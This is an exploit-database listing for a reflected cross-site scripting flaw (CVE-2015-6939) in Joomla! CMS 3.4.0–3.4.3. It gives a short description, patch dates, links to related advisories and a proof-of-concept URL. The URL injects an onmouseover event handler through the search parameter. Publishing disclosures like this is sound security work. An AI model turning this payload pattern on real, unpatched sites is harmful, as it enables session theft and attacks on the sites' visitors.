Lucene search
Cfreer1337DAY-ID-24390HistoryOct 09, 2015 - 12:00 a.m.
Joomla! CMS 3.4.3 Cross Site Scripting Vulnerability
2015-10-0900:00:00
cfreer
0day.today
34
0.003 Low
EPSS
Percentile
65.3%
Joomla! CMS versions 3.4.0 through 3.4.3 suffer from a cross site scripting vulnerability.
# Exploit Title: Joomla! CMS 3.4.0-3.4.3 XSS Vulnerability
# Date: 2015-08-18
# Exploit Author: cfreer ([emailΒ protected]) & 0keeteam
# Vendor Homepage: http://joomla.org
# Version: 3.4.0 through 3.4.3
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-6939
Description
Inadequate escaping leads to XSS vulnerability in login module.
Affected Installs
Joomla! CMS versions 3.4.0 through 3.4.3
POC:
http://localhost/joomla/index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search
=============================
Reported Date: 2015-August-18
Fixed Date: 2015-September-08
=============================
referer:
http://developer.joomla.org/security-centre.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6939
https://github.com/poc-lab/exp/blob/master/CVE-2015-6939
# 0day.today [2018-03-09] #Related
joomla
joomla
[20150908] - Core - XSS Vulnerability
2015-08-18 00:00:00
freebsd
freebsd
Joomla! -- Core - XSS Vulnerability
2015-09-08 00:00:00
nessus
nessus
FreeBSD : Joomla! -- Core - XSS Vulnerability (f8c37915-7ac5-11e5-b35a-002590263bf5)
2015-10-26 00:00:00
Joomla! 3.4.x < 3.4.4 Login Module XSS
2015-09-18 00:00:00
cvelist
cvelist
CVE-2015-6939
2015-09-18 16:00:00
nvd
nvd
CVE-2015-6939
2015-09-18 16:59:00
cve
cve
CVE-2015-6939
2015-09-18 16:59:00
packetstorm
packetstorm
Joomla! CMS 3.4.3 Cross Site Scripting
2015-10-09 00:00:00
openvas
openvas
Joomla CMS 'login' Module Cross-Site Scripting Vulnerability
2015-10-19 00:00:00
prion
prion
Cross site scripting
2015-09-18 16:59:00